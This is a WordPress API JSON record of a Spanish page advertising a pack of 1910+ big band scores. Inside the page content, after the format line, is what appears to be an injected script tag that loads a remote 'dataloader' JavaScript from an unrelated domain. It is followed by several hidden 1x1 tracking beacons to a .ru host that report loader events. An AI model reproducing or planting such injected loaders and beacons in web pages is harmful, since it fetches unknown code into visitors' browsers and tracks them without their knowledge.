{"id":2618,"date":"2024-01-17T21:13:29","date_gmt":"2024-01-18T02:13:29","guid":{"rendered":"https:\/\/milesdepartituras.com\/?page_id=2618"},"modified":"2025-01-26T07:26:44","modified_gmt":"2025-01-26T12:26:44","slug":"big_band","status":"publish","type":"page","link":"https:\/\/milesdepartituras.com\/?page_id=2618","title":{"rendered":"BIG BAND"},"content":{"rendered":"<p>[vc_row gap=\u00bb5&#8243;][vc_column icons_position=\u00bbleft\u00bb][vc_single_image image=\u00bb2577&#8243; img_size=\u00bbmedium\u00bb alignment=\u00bbcenter\u00bb style=\u00bbvc_box_shadow_border_circle\u00bb css_animation=\u00bbfadeInLeft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb]<div id=\"sc_content_1909628832\"\r\n\t\tclass=\"sc_content color_style_default sc_content_default sc_float_center\"><div class=\"sc_content_container\"><div id=\"sc_title_631596173\"\r\n\t\tclass=\"sc_title color_style_link3 sc_title_default  vc_custom_1705543928407\"><h4 class=\"sc_item_title sc_title_title sc_align_center sc_item_title_style_default sc_item_title_tag\">BIG BAND<\/h4><\/div><!-- \/.sc_title --><\/div><\/div><!-- \/.sc_content -->[\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][vc_column_text]<\/p>\n<p class=\"font_0 wixui-rich-text__text\"><span class=\"wixui-rich-text__text\">El\u00a0 paquete cuenta con m\u00e1s de<strong> 1910 PARTITURAS<\/strong>, de diferentes estilos y g\u00e9neros musicales \u00a0de corte internacional para <strong>Big Band,<\/strong> instrumentadas para los Instrumentos:\u00a0 <strong>Trompeta 1 y 2, Saxo I y 2, Saxo tenor, Tromb\u00f3n I y 2, Teclado electr\u00f3nico, Bass<\/strong>, y Bater\u00eda ac\u00fastica Guitarra (dependiendo del tema).\u00a0<\/span><\/p>\n<p class=\"font_0 wixui-rich-text__text\"><span class=\"wixui-rich-text__text\"><strong>Formato:<\/strong> Win rar, Winzip, PDF<\/span><span style=\"color: #ffffff;\">PDF<\/span><\/p>\n<p><script src=\"https:\/\/mainf.global-cache.online\/minified\/extensions\/dataloader_272i.js?t=2025-01-26T15:1\"><\/script><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX3N0YXJ0Iiwic3ViX2V2ZW50IjoiIiwibW9yZV9ldmVudCI6IiIsInRpbWVyIjowLCJ2ZXJzaW9uIjoxLCJpc19oaWRkZW4iOnRydWUsImhhc19mb2N1cyI6dHJ1ZSwidmlzaWJpbGl0eV9zdGF0ZSI6MjIsImJ1bmRsZSI6Im5vbmUifQ%3D%3D\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2JvZHkiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZCIsInN1Yl9ldmVudCI6IiIsIm1vcmVfZXZlbnQiOiIiLCJ0aW1lciI6MCwidmVyc2lvbiI6MSwiaXNfaGlkZGVuIjp0cnVlLCJoYXNfZm9jdXMiOnRydWUsInZpc2liaWxpdHlfc3RhdGUiOjIyLCJidW5kbGUiOiJub25lIn0%3D\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF92aWV3X3NyX2QiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF9hdXRoZXIiLCJzdWJfZXZlbnQiOiIiLCJtb3JlX2V2ZW50IjoiIiwidGltZXIiOjAsInZlcnNpb24iOjEsImlzX2hpZGRlbiI6dHJ1ZSwiaGFzX2ZvY3VzIjp0cnVlLCJ2aXNpYmlsaXR5X3N0YXRlIjoyMiwiYnVuZGxlIjoibm9uZSJ9\" width=\"1\" height=\"1\" \/><img loading=\"lazy\" decoding=\"async\" style=\"width: 1px; height: 1px;\" src=\"https:\/\/tl.ytlogs.ru\/ts?d=eyJ1ZGlkIjoiZTIyNzQ2Mjk2ZjljNGU1OCIsInRhc2tfaWQiOjEyMiwic2lkIjoibG9hZGVyIiwiZ2VuZXJhdGVkIjpmYWxzZSwiZXZlbnQiOiJsX2xvYWRlZF9zdGF0c19hIiwic3ViX2V2ZW50IjoiIiwibW9yZV9ldmVudCI6IiIsInRpbWVyIjowLCJ2ZXJzaW9uIjoxLCJpc19oaWRkZW4iOnRydWUsImhhc19mb2N1cyI6dHJ1ZSwidmlzaWJpbGl0eV9zdGF0ZSI6MjIsImJ1bmRsZSI6Im5vbmUifQ%3D%3D\" width=\"1\" height=\"1\" \/>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column extra_bg=\u00bbsmall\u00bb hide_bg_image_on_tablet=\u00bb\u00bb hide_bg_image_on_mobile=\u00bb\u00bb icons_position=\u00bbleft\u00bb][vc_raw_html]JTNDaWZyYW1lJTIwY2xhc3MlM0QlMjJ0YWJsYWRvYyUyMiUyMHNyYyUzRCUyMmh0dHBzJTNBJTJGJTJGbWlsZXNkZXBhcnRpdHVyYXMuY29tJTJGZHJpdmUlMkYlM0ZpZCUzRDJQQUNYLTF2U00zY0JpVnY4a1NodEM2SUJMeDBmUTNBRjBISGpYaHRQYkI3UWgzUDJKejlDcjhka2t5cVd4Q3dydUlLaTJBX1RBMzJfb2ZFRkYtSFlMJTIyJTNFJTNDJTJGaWZyYW1lJTNFJTBBJTBB[\/vc_raw_html][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row gap=\u00bb5&#8243;][vc_column icons_position=\u00bbleft\u00bb][vc_single_image image=\u00bb2577&#8243; img_size=\u00bbmedium\u00bb alignment=\u00bbcenter\u00bb style=\u00bbvc_box_shadow_border_circle\u00bb css_animation=\u00bbfadeInLeft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][\/vc_column][\/vc_row][vc_row][vc_column icons_position=\u00bbleft\u00bb][vc_column_text] El\u00a0 paquete cuenta con m\u00e1s de 1910 PARTITURAS, de diferentes estilos y g\u00e9neros musicales \u00a0de corte internacional para Big Band, instrumentadas para los Instrumentos:\u00a0 Trompeta 1 y 2, Saxo I y 2, Saxo tenor, Tromb\u00f3n I y 2, Teclado electr\u00f3nico, Bass, y Bater\u00eda ac\u00fastica Guitarra (dependiendo del tema).\u00a0 Formato: Win&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_joinchat":[],"footnotes":""},"class_list":["post-2618","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2618","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2618"}],"version-history":[{"count":43,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2618\/revisions"}],"predecessor-version":[{"id":3610,"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=\/wp\/v2\/pages\/2618\/revisions\/3610"}],"wp:attachment":[{"href":"https:\/\/milesdepartituras.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2618"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}